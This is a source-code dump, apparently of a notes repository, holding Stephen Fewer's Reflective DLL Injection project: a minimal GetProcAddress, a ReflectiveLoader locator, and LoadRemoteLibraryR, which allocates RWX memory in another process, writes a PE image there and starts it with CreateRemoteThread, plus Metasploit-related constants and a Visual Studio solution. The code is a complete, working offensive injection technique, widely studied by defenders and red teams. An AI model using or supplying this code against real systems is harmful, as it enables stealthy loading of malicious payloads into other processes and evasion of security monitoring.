 11 | //     * Redistributions in binary form must reproduce the above copyright notice, this list of 
 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 
 13 | // with the distribution.
 14 | // 
 15 | //     * Neither the name of Harmony Security nor the names of its contributors may be used to
 16 | // endorse or promote products derived from this software without specific prior written permission.
 17 | // 
 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
 26 | // POSSIBILITY OF SUCH DAMAGE.
 27 | //===============================================================================================//
 28 | #include "GetProcAddressR.h"
 29 | //===============================================================================================//
 30 | // We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
 31 | // wont be able to resolve exported addresses in reflectivly loaded librarys.
 32 | FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
 33 | {
 34 | 	UINT_PTR uiLibraryAddress = 0;
 35 | 	FARPROC fpResult          = NULL;
 36 | 
 37 | 	if( hModule == NULL )
 38 | 		return NULL;
 39 | 
 40 | 	// a module handle is really its base address
 41 | 	uiLibraryAddress = (UINT_PTR)hModule;
 42 | 
 43 | 	__try
 44 | 	{
 45 | 		UINT_PTR uiAddressArray = 0;
 46 | 		UINT_PTR uiNameArray    = 0;
 47 | 		UINT_PTR uiNameOrdinals = 0;
 48 | 		PIMAGE_NT_HEADERS pNtHeaders             = NULL;
 49 | 		PIMAGE_DATA_DIRECTORY pDataDirectory     = NULL;
 50 | 		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
 51 | 			
 52 | 		// get the VA of the modules NT Header
 53 | 		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
 54 | 
 55 | 		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
 56 | 
 57 | 		// get the VA of the export directory
 58 | 		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
 59 | 			
 60 | 		// get the VA for the array of addresses
 61 | 		uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
 62 | 
 63 | 		// get the VA for the array of name pointers
 64 | 		uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
 65 | 				
 66 | 		// get the VA for the array of name ordinals
 67 | 		uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
 68 | 
 69 | 		// test if we are importing by name or by ordinal...
 70 | 		if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
 71 | 		{
 72 | 			// import by ordinal...
 73 | 
 74 | 			// use the import ordinal (- export ordinal base) as an index into the array of addresses
 75 | 			uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
 76 | 
 77 | 			// resolve the address for this imported function
 78 | 			fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
 79 | 		}
 80 | 		else
 81 | 		{
 82 | 			// import by name...
 83 | 			DWORD dwCounter = pExportDirectory->NumberOfNames;
 84 | 			while( dwCounter-- )
 85 | 			{
 86 | 				char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
 87 | 				
 88 | 				// test if we have a match...
 89 | 				if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
 90 | 				{
 91 | 					// use the functions name ordinal as an index into the array of name pointers
 92 | 					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
 93 | 					
 94 | 					// calculate the virtual address for the function
 95 | 					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
 96 | 					
 97 | 					// finish...
 98 | 					break;
 99 | 				}
100 | 						
101 | 				// get the next exported function name
102 | 				uiNameArray += sizeof(DWORD);
103 | 
104 | 				// get the next exported function name ordinal
105 | 				uiNameOrdinals += sizeof(WORD);
106 | 			}
107 | 		}
108 | 	}
109 | 	__except( EXCEPTION_EXECUTE_HANDLER )
110 | 	{
111 | 		fpResult = NULL;
112 | 	}
113 | 
114 | 	return fpResult;
115 | }
116 | //===============================================================================================//


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/src/GetProcAddressR.h:
--------------------------------------------------------------------------------
 1 | //===============================================================================================//
 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
 3 | // All rights reserved.
 4 | // 
 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 
 6 | // provided that the following conditions are met:
 7 | // 
 8 | //     * Redistributions of source code must retain the above copyright notice, this list of 
 9 | // conditions and the following disclaimer.
10 | // 
11 | //     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12 | // conditions and the following disclaimer in the documentation and/or other materials provided 
13 | // with the distribution.
14 | // 
15 | //     * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | // 
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
29 | #define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
30 | //===============================================================================================//
31 | #include "ReflectiveDLLInjection.h"
32 | 
33 | FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
34 | //===============================================================================================//
35 | #endif
36 | //===============================================================================================//
37 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/src/Inject.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/src/Inject.c


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/src/LoadLibraryR.c:
--------------------------------------------------------------------------------
  1 | //===============================================================================================//
  2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
  3 | // All rights reserved.
  4 | // 
  5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 
  6 | // provided that the following conditions are met:
  7 | // 
  8 | //     * Redistributions of source code must retain the above copyright notice, this list of 
  9 | // conditions and the following disclaimer.
 10 | // 
 11 | //     * Redistributions in binary form must reproduce the above copyright notice, this list of 
 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 
 13 | // with the distribution.
 14 | // 
 15 | //     * Neither the name of Harmony Security nor the names of its contributors may be used to
 16 | // endorse or promote products derived from this software without specific prior written permission.
 17 | // 
 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
 26 | // POSSIBILITY OF SUCH DAMAGE.
 27 | //===============================================================================================//
 28 | #include "LoadLibraryR.h"
 29 | #include <stdio.h>
 30 | //===============================================================================================//
 31 | DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
 32 | {    
 33 | 	WORD wIndex                          = 0;
 34 | 	PIMAGE_SECTION_HEADER pSectionHeader = NULL;
 35 | 	PIMAGE_NT_HEADERS pNtHeaders         = NULL;
 36 | 	
 37 | 	pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
 38 | 
 39 | 	pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
 40 | 
 41 |     if( dwRva < pSectionHeader[0].PointerToRawData )
 42 |         return dwRva;
 43 | 
 44 |     for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
 45 |     {   
 46 |         if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
 47 |            return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
 48 |     }
 49 |     
 50 |     return 0;
 51 | }
 52 | //===============================================================================================//
 53 | DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
 54 | {
 55 | 	UINT_PTR uiBaseAddress   = 0;
 56 | 	UINT_PTR uiExportDir     = 0;
 57 | 	UINT_PTR uiNameArray     = 0;
 58 | 	UINT_PTR uiAddressArray  = 0;
 59 | 	UINT_PTR uiNameOrdinals  = 0;
 60 | 	DWORD dwCounter          = 0;
 61 | #ifdef WIN_X64
 62 | 	DWORD dwCompiledArch = 2;
 63 | #else
 64 | 	// This will catch Win32 and WinRT.
 65 | 	DWORD dwCompiledArch = 1;
 66 | #endif
 67 | 
 68 | 	uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
 69 | 
 70 | 	// get the File Offset of the modules NT Header
 71 | 	uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
 72 | 
 73 | 	// currenlty we can only process a PE file which is the same type as the one this fuction has  
 74 | 	// been compiled as, due to various offset in the PE structures being defined at compile time.
 75 | 	if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
 76 | 	{
 77 | 		if( dwCompiledArch != 1 )
 78 | 			return 0;
 79 | 	}
 80 | 	else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
 81 | 	{
 82 | 		if( dwCompiledArch != 2 )
 83 | 			return 0;
 84 | 	}
 85 | 	else
 86 | 	{
 87 | 		return 0;
 88 | 	}
 89 | 
 90 | 	// uiNameArray = the address of the modules export directory entry
 91 | 	uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
 92 | 
 93 | 	// get the File Offset of the export directory
 94 | 	uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
 95 | 
 96 | 	// get the File Offset for the array of name pointers
 97 | 	uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
 98 | 
 99 | 	// get the File Offset for the array of addresses
100 | 	uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
101 | 
102 | 	// get the File Offset for the array of name ordinals
103 | 	uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );	
104 | 
105 | 	// get a counter for the number of exported functions...
106 | 	dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
107 | 
108 | 	// loop through all the exported functions to find the ReflectiveLoader
109 | 	while( dwCounter-- )
110 | 	{
111 | 		char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
112 | 
113 | 		if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
114 | 		{
115 | 			// get the File Offset for the array of addresses
116 | 			uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );	
117 | 	
118 | 			// use the functions name ordinal as an index into the array of name pointers
119 | 			uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
120 | 
121 | 			// return the File Offset to the ReflectiveLoader() functions code...
122 | 			return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
123 | 		}
124 | 		// get the next exported function name
125 | 		uiNameArray += sizeof(DWORD);
126 | 
127 | 		// get the next exported function name ordinal
128 | 		uiNameOrdinals += sizeof(WORD);
129 | 	}
130 | 
131 | 	return 0;
132 | }
133 | //===============================================================================================//
134 | // Loads a DLL image from memory via its exported ReflectiveLoader function
135 | HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
136 | {
137 | 	HMODULE hResult                    = NULL;
138 | 	DWORD dwReflectiveLoaderOffset     = 0;
139 | 	DWORD dwOldProtect1                = 0;
140 | 	DWORD dwOldProtect2                = 0;
141 | 	REFLECTIVELOADER pReflectiveLoader = NULL;
142 | 	DLLMAIN pDllMain                   = NULL;
143 | 
144 | 	if( lpBuffer == NULL || dwLength == 0 )
145 | 		return NULL;
146 | 
147 | 	__try
148 | 	{
149 | 		// check if the library has a ReflectiveLoader...
150 | 		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
151 | 		if( dwReflectiveLoaderOffset != 0 )
152 | 		{
153 | 			pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
154 | 
155 | 			// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
156 | 			// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
157 | 			if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
158 | 			{
159 | 				// call the librarys ReflectiveLoader...
160 | 				pDllMain = (DLLMAIN)pReflectiveLoader();
161 | 				if( pDllMain != NULL )
162 | 				{
163 | 					// call the loaded librarys DllMain to get its HMODULE
164 | 					if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )	
165 | 						hResult = NULL;
166 | 				}
167 | 				// revert to the previous protection flags...
168 | 				VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
169 | 			}
170 | 		}
171 | 	}
172 | 	__except( EXCEPTION_EXECUTE_HANDLER )
173 | 	{
174 | 		hResult = NULL;
175 | 	}
176 | 
177 | 	return hResult;
178 | }
179 | //===============================================================================================//
180 | // Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
181 | // Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR 
182 | //       defined in order to use the correct RDI prototypes.
183 | // Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
184 | //       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
185 | // Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
186 | // Note: This function currently cant inject accross architectures, but only to architectures which are the 
187 | //       same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
188 | HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
189 | {
190 | 	BOOL bSuccess                             = FALSE;
191 | 	LPVOID lpRemoteLibraryBuffer              = NULL;
192 | 	LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
193 | 	HANDLE hThread                            = NULL;
194 | 	DWORD dwReflectiveLoaderOffset            = 0;
195 | 	DWORD dwThreadId                          = 0;
196 | 
197 | 	__try
198 | 	{
199 | 		do
200 | 		{
201 | 			if( !hProcess  || !lpBuffer || !dwLength )
202 | 				break;
203 | 
204 | 			// check if the library has a ReflectiveLoader...
205 | 			dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
206 | 			if( !dwReflectiveLoaderOffset )
207 | 				break;
208 | 
209 | 			// alloc memory (RWX) in the host process for the image...
210 | 			lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
211 | 			if( !lpRemoteLibraryBuffer )
212 | 				break;
213 | 
214 | 			// write the image into the host process...
215 | 			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
216 | 				break;
217 | 			
218 | 			// add the offset to ReflectiveLoader() to the remote library address...
219 | 			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
220 | 
221 | 			// create a remote thread in the host process to call the ReflectiveLoader!
222 | 			hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
223 | 
224 | 		} while( 0 );
225 | 
226 | 	}
227 | 	__except( EXCEPTION_EXECUTE_HANDLER )
228 | 	{
229 | 		hThread = NULL;
230 | 	}
231 | 
232 | 	return hThread;
233 | }
234 | //===============================================================================================//
235 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/src/LoadLibraryR.h:
--------------------------------------------------------------------------------
 1 | //===============================================================================================//
 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
 3 | // All rights reserved.
 4 | // 
 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 
 6 | // provided that the following conditions are met:
 7 | // 
 8 | //     * Redistributions of source code must retain the above copyright notice, this list of 
 9 | // conditions and the following disclaimer.
10 | // 
11 | //     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12 | // conditions and the following disclaimer in the documentation and/or other materials provided 
13 | // with the distribution.
14 | // 
15 | //     * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | // 
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
30 | //===============================================================================================//
31 | #include "ReflectiveDLLInjection.h"
32 | 
33 | DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
34 | 
35 | HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
36 | 
37 | HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
38 | 
39 | //===============================================================================================//
40 | #endif
41 | //===============================================================================================//
42 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/src/ReflectiveDLLInjection.h:
--------------------------------------------------------------------------------
 1 | //===============================================================================================//
 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
 3 | // All rights reserved.
 4 | // 
 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 
 6 | // provided that the following conditions are met:
 7 | // 
 8 | //     * Redistributions of source code must retain the above copyright notice, this list of 
 9 | // conditions and the following disclaimer.
10 | // 
11 | //     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12 | // conditions and the following disclaimer in the documentation and/or other materials provided 
13 | // with the distribution.
14 | // 
15 | //     * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | // 
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
32 | #include <windows.h>
33 | 
34 | // we declare some common stuff in here...
35 | 
36 | #define DLL_METASPLOIT_ATTACH	4
37 | #define DLL_METASPLOIT_DETACH	5
38 | #define DLL_QUERY_HMODULE		6
39 | 
40 | #define DEREF( name )*(UINT_PTR *)(name)
41 | #define DEREF_64( name )*(DWORD64 *)(name)
42 | #define DEREF_32( name )*(DWORD *)(name)
43 | #define DEREF_16( name )*(WORD *)(name)
44 | #define DEREF_8( name )*(BYTE *)(name)
45 | 
46 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID );
47 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
48 | 
49 | #define DLLEXPORT   __declspec( dllexport ) 
50 | 
51 | //===============================================================================================//
52 | #endif
53 | //===============================================================================================//
54 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/rdi.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Express 2012 for Windows Desktop
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject\inject.vcxproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
 5 | EndProject
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|ARM = Debug|ARM
11 | 		Debug|Win32 = Debug|Win32
12 | 		Debug|x64 = Debug|x64
13 | 		Release|ARM = Release|ARM
14 | 		Release|Win32 = Release|Win32
15 | 		Release|x64 = Release|x64
16 | 	EndGlobalSection
17 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.ActiveCfg = Release|ARM
19 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.Build.0 = Release|ARM
20 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
21 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
22 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.ActiveCfg = Release|x64
23 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.Build.0 = Release|x64
24 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.ActiveCfg = Release|ARM
25 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.Build.0 = Release|ARM
26 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
27 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
28 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.ActiveCfg = Release|x64
29 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.Build.0 = Release|x64
30 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM
31 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM
32 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
33 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
34 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
35 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
36 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM
37 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM
38 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
39 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
40 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
41 | 		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
42 | 	EndGlobalSection
43 | 	GlobalSection(SolutionProperties) = preSolution
44 | 		HideSolutionNode = FALSE
45 | 	EndGlobalSection
46 | EndGlobal
47 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/x64/Release/inject.x64.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/x64/Release/inject.x64.iobj


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/x64/Release/inject.x64.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/x64/Release/inject.x64.ipdb


